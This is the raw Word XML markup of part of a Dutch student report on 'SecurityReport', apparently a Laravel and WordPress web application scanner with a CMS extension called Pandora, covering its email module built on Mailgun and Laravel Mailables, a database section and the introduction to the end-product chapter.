                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914861</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1031188</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4A335" id="Rectangle 520" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.05pt;margin-top:-81.1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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0089121A">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00E12294">
        <w:t>.5 E-Mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A9EC0" w14:textId="77777777" w:rsidR="00E12294" w:rsidRDefault="00E12294" w:rsidP="00E12294">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353E3B32" w14:textId="3FBA442A" w:rsidR="00205BD3" w:rsidRDefault="009F60C4" w:rsidP="0065002E">
      <w:r>
        <w:t xml:space="preserve">Voor het E-mailen van alle servicemails gebruikt SecurityReport Mailgun. Met Mailgun </w:t>
      </w:r>
      <w:r w:rsidR="001125C3">
        <w:t>kunnen de sevicemails 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06"/>
        <w:gridCol w:w="4510"/>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230629AD"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78">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r w:rsidR="00426B8E">
        <w:t>Tabel 4.23</w:t>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2E222"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9">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3E799F19" w14:textId="5AD96656" w:rsidR="00426B8E" w:rsidRDefault="00426B8E" w:rsidP="0065002E">
      <w:r>
        <w:t>Figuur 4.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094C1C4" w14:textId="77777777" w:rsidR="00B66B91" w:rsidRDefault="00B66B91" w:rsidP="0065002E">
      <w:r>
        <w:t>Modulaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435641A9" w14:textId="241AB245" w:rsidR="00D55E15" w:rsidRDefault="00E9328E" w:rsidP="003679C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678702" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D649FFA" wp14:editId="3B41F8EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>714375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5464810" cy="3514090"/>
                <wp:effectExtent l="0" t="0" r="21590" b="16510"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21545"/>
                    <wp:lineTo x="21585" y="21545"/>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51409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49EB" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.85pt;margin-top:56.25pt;width:430.3pt;height:276.7pt;z-index:25167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" fillcolor="#ffd966"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679727" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F3DDF8E" wp14:editId="6DB54C61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2469515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>952500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2032000" cy="3161665"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21518"/>
                    <wp:lineTo x="21600" y="21518"/>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161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88304" id="Rectangle 617" o:spid="_x0000_s1026" style="position:absolute;margin-left:194.45pt;margin-top:75pt;width:160pt;height:248.95pt;z-index:251679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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F27CCD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252906496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55A858D1" wp14:editId="7717A207">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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84"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="35366807" w14:textId="19C29DCB" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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0352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F67E065" wp14:editId="60AFCC98">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Regist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85"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C509511" w14:textId="5E9995A3" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Registratie</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10592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45A31F9B" wp14:editId="66A11C6F">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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86"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CPrY5aegIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBZskQG3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="69BA2D54" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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8544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11353E8B" wp14:editId="5348CC58">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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87"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0420DDD7" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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4448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F1AADFC" wp14:editId="2AD41FBD">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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88"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CD031C4" w14:textId="5E3DEB9C" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E" w:rsidP="00556CF7">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</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2400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78A30E29" wp14:editId="2F35D36A">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E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E"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89"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2MGHoCAABlBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW6B0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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5195B621" w14:textId="10CABD63" w:rsidR="00E2204E" w:rsidRPr="00556CF7" w:rsidRDefault="00E2204E" w:rsidP="00556CF7">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Premium</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7BFD398E">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70F0"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3C9602A2">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6BD0"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61EFD90A">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C6868"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49664CD1">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E2204E" w:rsidRPr="00305920" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>M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90"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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55B25B72" w14:textId="1C796D36" w:rsidR="00E2204E" w:rsidRPr="00305920" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mailable</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26D27259">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CC4D5"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14411464">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337A1"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72798E41">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E3DC8"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4AF08E3C">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09781"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098D66AC">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8340D"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3C535038">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7615"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10A883EB">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E366"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2BD98106">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78E6D"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523794ED">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E2204E" w:rsidRPr="00D34083" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Mail Fac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91"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AQ&#10;RI9KhwIAAJEFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQCXD+sE3gAAAAoBAAAPAAAAAAAAAAAAAAAAAN8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAA6gUAAAAA&#10;" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="203322E0" w14:textId="2600AE36" w:rsidR="00E2204E" w:rsidRPr="00D34083" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mail Facadé</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39592875">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E2204E" w:rsidRPr="00D34083" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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92"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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6A95E7B8" w14:textId="3C6015D6" w:rsidR="00E2204E" w:rsidRPr="00D34083" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Laravel</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2C71DA9C">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CF251"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Laravel Library Mail dat het aanmaken van Service E-mails gemakkelijk maakt. Met Mail kunnen er </w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidR="003679C4">
        <w:t xml:space="preserve"> gemaakt worden van Service E-mails zoals de registratie e-mail.</w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t xml:space="preserve"> De e-mail modules worden </w:t>
      </w:r>
      <w:r w:rsidR="00D55E15">
        <w:t>verlengd</w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t xml:space="preserve"> (extends) met</w:t>
      </w:r>
      <w:r w:rsidR="00D55E15">
        <w:t xml:space="preserve"> een Mailable Klasse waarmee een e-mail opgebouwd kan worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F245E1E" w14:textId="2BCA7B57" w:rsidR="003679C4" w:rsidRDefault="00981C3F" w:rsidP="003679C4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9328E">
        <w:t>Figuur 4.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E09FAF" w14:textId="77777777" w:rsidR="00814E18" w:rsidRDefault="00814E18" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555AE579" w14:textId="77777777" w:rsidR="00814E18" w:rsidRDefault="00814E18" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32603974" w14:textId="720E18A9" w:rsidR="005A7696" w:rsidRPr="00E7597A" w:rsidRDefault="00C552A1" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253212672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4916B6FC" wp14:editId="1640D556">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-910416</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-910416</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="801" name="Rectangle 8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05CBD" id="Rectangle 801" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.7pt;margin-top:-71.65pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C710D1">
        <w:t xml:space="preserve">4.5.6 </w:t>
      </w:r>
      <w:r w:rsidR="005A7696" w:rsidRPr="00E7597A">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088D81B" w14:textId="1BE55256"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Acunetix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p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="3007"/>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Param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78B62AA1" w14:textId="0B167D07" w:rsidR="00013211" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:t>Tabel 4.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79CAC2" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF4D2A" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025">
      <w:pPr>
        <w:sectPr w:rsidR="00D41025" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId80"/>
          <w:headerReference w:type="first" r:id="rId81"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C732C2" w14:textId="7E93CCE7" w:rsidR="00013211" w:rsidRDefault="00D41025">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253338624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="047BA90F" wp14:editId="2DDFD24E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-409575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1799590</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529D2" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00A14BEE" w:rsidRDefault="00D41025" w:rsidP="00D41025">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A90F" id="Text Box 554" o:spid="_x0000_s1193" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-32.25pt;margin-top:141.7pt;width:255.65pt;height:54.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3DE529D2" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00A14BEE" w:rsidRDefault="00D41025" w:rsidP="00D41025">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253336576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41DD2A08" wp14:editId="04E978A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-469265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3175635</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59467" id="Rounded Rectangle 591" o:spid="_x0000_s1026" style="position:absolute;margin-left:-36.95pt;margin-top:250.05pt;width:495pt;height:126pt;z-index:2533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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253337600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="589453FD" wp14:editId="5EA5ACB2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-347980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3400425</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CDC749A" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025" w:rsidP="00D41025">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00435E58">
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="10721BFA" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00EF79AD" w:rsidRDefault="00D41025" w:rsidP="00D41025">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04A80C1B" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00CA4BC9" w:rsidRDefault="00D41025" w:rsidP="00D41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53FD" id="Text Box 551" o:spid="_x0000_s1194" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-27.4pt;margin-top:267.75pt;width:460.05pt;height:80.9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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5CDC749A" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025" w:rsidP="00D41025">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00435E58">
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="10721BFA" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00EF79AD" w:rsidRDefault="00D41025" w:rsidP="00D41025">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04A80C1B" w14:textId="77777777" w:rsidR="00D41025" w:rsidRPr="00CA4BC9" w:rsidRDefault="00D41025" w:rsidP="00D41025"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253339648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E52FD30" wp14:editId="24B35988">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-464820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>429895</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0">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333504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7831E363" wp14:editId="0728C091">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>-112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7620000" cy="10859135"/>
                <wp:effectExtent l="0" t="0" r="25400" b="37465"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="960" name="Rectangle 960"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7620000" cy="10859135"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="BC2422"/>
                        </a:solidFill>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="BC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F63E" id="Rectangle 960" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1in;margin-top:-8.8pt;width:600pt;height:855.0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" fillcolor="#bc2422" strokecolor="#bc2422" strokeweight="1pt">
                <w10:wrap type="square" anchory="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00013211">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="141CEC2A" w14:textId="43262AA0" w:rsidR="00364C92" w:rsidRDefault="00013211" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252919808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10450613" wp14:editId="6145E94C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1021985</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5A871" id="Rectangle 37" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-80.4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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EE50BB">
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00364C92">
        <w:t>eindproduct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDEBC8" w14:textId="2B5873E2" w:rsidR="00E70EAE" w:rsidRDefault="00E70EAE" w:rsidP="00994238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268C132" w14:textId="6C7E1FA9" w:rsidR="00712A4B" w:rsidRDefault="00A55095" w:rsidP="00994238">
      <w:r>
        <w:t>In dit hoofdstuk zal ik het eindproduct</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t xml:space="preserve"> SecurityRaport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> behandelen wat het gehele software</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t>systeem is. Het softwaresysteem dat ik in het concept (H4) heb gedefinieerd heb ik in de afgelopen maanden ontwikkeld met de Fra</w:t>
      </w:r>
      <w:r w:rsidR="00CF3D04">
        <w:t>mework Laravel en Wordpress. SecurityReport</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bestaat uit twee subsystemen, de </w:t>
      </w:r>
      <w:r w:rsidR="001F11E3">
        <w:t>webapplicatie scanner en de CMS-</w:t>
      </w:r>
      <w:r w:rsidR="009B4A9C">
        <w:t>extensie Pandora.</w:t>
      </w:r>
      <w:r w:rsidR="00B44E8B">
        <w:t xml:space="preserve"> Het visuele gedeelte van het softwaresysteem zal ik met illustratie laten zien en de business logica, dus de werking van het systeem met diagrammen.</w:t>
      </w:r>
      <w:r w:rsidR="005E35B4">
        <w:t xml:space="preserve"> </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Pandora CMS extensie</w:t>
            </w:r>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r>
              <w:t>Admin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0D01A263" w14:textId="5DDADD46" w:rsidR="002018B5" w:rsidRDefault="00FF4610">
      <w:r>
        <w:t>Tabel 5.1</w:t>
      </w:r>
    </w:p>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drie webservers: Apache2, MAMP Apache, Artisan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Wordpress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r>
              <w:t>Artisan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Admin Paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E1CED96" w14:textId="3067B8FF" w:rsidR="00496C4F" w:rsidRDefault="00EF24AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253009920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AFB5863" wp14:editId="7C614333">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1689735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1891665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="810895" cy="810895"/>
            <wp:effectExtent l="0" t="0" r="1905"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02" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AF7CF72" wp14:editId="67199124">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1377950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1443990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1391920" cy="341630"/>
                <wp:effectExtent l="25400" t="25400" r="30480" b="39370"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="1182" y="-1606"/>
                    <wp:lineTo x="-394" y="0"/>
                    <wp:lineTo x="-394" y="12848"/>
                    <wp:lineTo x="1182" y="22483"/>
                    <wp:lineTo x="20496" y="22483"/>
                    <wp:lineTo x="21679" y="12848"/>
                    <wp:lineTo x="21679" y="6424"/>
                    <wp:lineTo x="20496" y="-1606"/>
                    <wp:lineTo x="1182" y="-1606"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="716" name="Left-Right Arrow 716"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
